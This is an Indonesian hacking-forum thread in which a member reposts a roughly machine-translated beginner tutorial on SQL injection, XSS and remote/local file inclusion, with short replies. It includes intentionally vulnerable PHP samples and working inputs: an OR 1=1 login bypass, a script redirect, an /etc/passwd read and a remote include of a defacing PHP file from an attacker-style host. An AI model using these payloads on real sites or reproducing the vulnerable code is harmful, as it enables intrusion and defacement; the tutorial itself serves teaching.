X-code Professional

X-code Community

Facebook group

Instagram X-code

Twitter

X-code Blog

Panel
Welcome! Anonymous

[share] Dasar Web Hacking (Sql inj, Xss,RFI)

[ { NUM_COMMENT }]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

[share] Dasar Web Hacking (Sql inj, Xss,RFI)

Postby peniru » Sat Jan 23, 2010 9:35 pm

habis keliling nyari-nyari tutor untuk menambah pengetahuan q yang masih kurang ini, q nemuin sebuat thread di slah satu situs n q rasa membantu sy memahami sql injection, RFI, n Xss

kira -kira isinya seperti berikut :
Common Web-Script Vulnerabilities

Dalam bagian ini, saya akan menulis tentang kerentanan dalam server web server-sided kode. Berikut adalah topik yang saya akan meliputi:

* SQL Injection
* XSS (Cross-Site Scripting)
* RFI / LFI (Remote / Local File Include)

SQL Injection
Deskripsi
Injeksi SQL adalah tindakan injeksi Anda sendiri, adat-crafted perintah SQL ke web-script sehingga Anda dapat memanipulasi database dengan cara apapun yang Anda inginkan. Beberapa contoh penggunaan SQL injection: Bypass login verifikasi, menambahkan account admin baru, angkat sandi, angkat rincian kartu kredit, dll; Anda dapat mengakses segala sesuatu yang ada di database.

Contoh Rentan Kode - login.php (PHP / MySQL)
Berikut adalah contoh kode login yang rentan
PHP
<?php
$user = $_POST['u'];
$pass = $_POST['p'];

if (!isset($user) || !isset($pass)) {
echo("<form method=post><input type=text name=u value=Username><br /><input type=password name=p value=Password><br /><input type=submit value=Login></form>");
} else {
$sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
$ret = mysql_query($sql);
$ret = mysql_fetch_array($ret);
if ($ret[0] != "") {
echo("Welcome, $user.");
} else {
echo("Incorrect login details.");
}
}
?>

Pada dasarnya apa yang dilakukan kode ini, adalah mengambil username dan password masukan, dan mengambil IP pengguna dari database dalam rangka untuk memeriksa validitas username / password combo.

Pengujian Input Untuk Vulnerability
Hanya membuang " '" ke dalam masukan, dan melihat apakah output kesalahan, jika demikian, mungkin yang disuntikkan. Jika tidak menampilkan apa-apa, mungkin injeksi, dan jika demikian, Anda akan berurusan dengan injeksi SQL buta yang setiap orang bisa mengatakan tidak menyenangkan. Lain, bukan disuntikkan.

Contoh Exploit
Andaikan saja kita mengetahui username admin Administrator dan kami ingin masuk ke rekening. Karena kode tidak menyaring masukan kami, kami dapat memasukkan apa pun yang kita inginkan ke dalam pernyataan, dan hanya membiarkan diri masuk Untuk melakukan hal ini, kami hanya akan menempatkan "Administrator" di dalam kotak nama pengguna, dan " 'OR 1 = 1 -- - "ke dalam kotak password; yang dihasilkan query SQL yang akan dijalankan terhadap database akan" SELECT `IP` FROM `user` WHERE `username` = 'Admin' AND `password =''OR 1 = 1 - '" . Karena "OR 1 = 1", itu akan memiliki kemampuan untuk mengabaikan sandi persyaratan, karena seperti yang kita semua tahu, logika "OR" hanya memerlukan satu pertanyaan untuk menghasilkan benar untuk mencapai sukses, dan sejak 1 selalu sama dengan 1, ia bekerja; yang "-" adalah 'komentar' karakter untuk SQL yang berarti mengabaikan semuanya setelah itu, jika tidak yang terakhir " '" akan merusak sintaks, dan hanya menyebabkan permintaan gagal.

XSS (Cross-Site Scripting)
Deskripsi
Celah ini memungkinkan penyerang masukan untuk dikirim ke korban tidak curiga. Penggunaan utama untuk kerentanan ini adalah mencuri cookie, jika seorang penyerang mencuri cookie Anda, mereka dapat login ke situs apa pun mereka mencuri cookie Anda dari bawah account Anda (biasanya, dan dengan asumsi Anda log in pada saat itu.)

Contoh Rentan Kode - search.php (PHP)

<?php
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo("You searched for $s. There were no results found");
?>

Pengujian Input Untuk Vulnerability
Untuk ini, kita uji dengan melemparkan beberapa HTML ke mesin pencari, seperti "<font color=red> XSS </ font>". Jika situs rentan terhadap XSS, Anda akan melihat sesuatu seperti ini: XSS, lain, itu tidak rentan.

Contoh Kode Exploit (Redirect)
Karena kita berarti, kita ingin mengarahkan korban untuk goatse (tidak terlihat bahwa jika Anda tidak tahu apa itu) dengan menipu mereka untuk mengklik link menunjuk ke "search.php? Search = <script > window.location = 'http://goatse.cz/' </ script> ". Ini akan menampilkan "You searched for <script> window.location = 'http://goatse.cz/' </ script>. Tak ada hasil ditemukan" (HTML) dan dengan asumsi browser target mendukung JS (JavaScript) yang semua browser modern lakukan apabila pengaturan dimatikan, itu akan mengarahkan mereka untuk goatse.

RFI / LFI (Remote / Local File Include)
Deskripsi
Celah ini memungkinkan pengguna untuk memasukkan remote atau file lokal, dan memilikinya parsing dan dijalankan pada server lokal.

Contoh Rentan Kode - index.php (PHP)

<?php
$page = $_GET['p'];
if (isset($page)) {
include($page);
} else {
include("home.php");
}
?>


Pengujian Input Untuk Vulnerability
Cobalah mengunjungi "index.php? P = http://www.google.com/"; jika Anda melihat Google, sangat rentan terhadap RFI dan LFI akibatnya. Jika anda tidak tidak rentan terhadap RFI, tetapi masih mungkin rentan terhadap LFI. Dengan asumsi bahwa server yang digunakan * nix, coba melihat "index.php? P = / etc / passwd"; jika Anda melihat file passwd, itu rentan terhadap LFI; lain, itu tidak rentan terhadap RFI atau LFI.

Contoh Exploit
Katakanlah target rentan terhadap RFI dan kami upload kode PHP berikut

<?php
unlink("index.php");
system("echo Hacked > index.php");
?>

dan kemudian kita melihat "index.php? p = http://our.site.com/malicious.php" maka kode berbahaya kita akan dijalankan pada server mereka, dan dengan demikian, situs mereka hanya akan berkata 'Hacked' sekarang .


buat para master,.,. maaf nih nulis thread kek gini,.,. buat noobie yang males baca apalagi males nyari-nyari info.. mending tobat deh.... :devil :devil

sumber
Code: Select all
http://www.cyberzoner.com/783-post2.html
Last edited by peniru on Mon Jan 25, 2010 3:30 pm, edited 1 time in total.
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
User avatar
peniru
 
Posts: 387
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar

Re: [share] Dasar Hacking

Postby wiLMaR_kiDz » Mon Jan 25, 2010 1:00 pm

owalaah...judul thrid ma isinya agak gk nyambung...
but, nice share bro.... :ngakak: :ngakak: :putusasa:
and keep share to Die... :circle:
Regards,

Ordinary Human,-
User avatar
wiLMaR_kiDz
 
Posts: 961
Joined: Fri Mar 27, 2009 1:03 pm
Location: Internet

Re: [share] Dasar Hacking

Postby peniru » Mon Jan 25, 2010 3:33 pm

wiLMaR_kiDz wrote:owalaah...judul thrid ma isinya agak gk nyambung...
but, nice share bro.... :ngakak: :ngakak: :putusasa:
and keep share to Die... :circle:


kk kids, mksi untuk koreksina..
:maaf: :maaf:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
User avatar
peniru
 
Posts: 387
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar

Re: [share] Dasar Web Hacking (Sql inj, Xss,RFI)

Postby shad.hckr » Fri Jan 29, 2010 12:17 pm

wah keren.. kalo bisa sekalian penanggulangannya. jadi gak cuman jadi striker tapi juga bisa jadi gelandang bertahan, center back atau bahkan kiper. hehehe..
User avatar
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: [share] Dasar Web Hacking (Sql inj, Xss,RFI)

Postby angginewman » Mon Feb 01, 2010 10:49 am

wah masi newwbie bnaget ne gak mudeng yang kayak begituan...emang gmana se om caranya??
angginewman
 
Posts: 10
Joined: Fri Jan 22, 2010 11:16 pm

Re: [share] Dasar Web Hacking (Sql inj, Xss,RFI)

Postby stavolt » Sat Feb 13, 2010 9:03 am

aku kok pusing yach :pusing: :pusing: :mati:
stavolt
 
Posts: 2
Joined: Sat Feb 13, 2010 8:26 am

Re: [share] Dasar Web Hacking (Sql inj, Xss,RFI)

Postby Darkzzzz » Sat Feb 13, 2010 9:23 am

@TS
Skrg gmn cara liad kode (script) php pd sbh web?
Kan klo view source, yg keluar script htmlnya?
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

Re: [share] Dasar Web Hacking (Sql inj, Xss,RFI)

Postby mobert » Fri Jul 01, 2011 4:43 pm

bahasanya gak mudeng..,bikn bngung..,ada lagi gak tutorialnya
mobert
 
Posts: 3
Joined: Sat Jun 25, 2011 10:15 pm

{ FACEBOOK_COMMENT }


Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 16 guests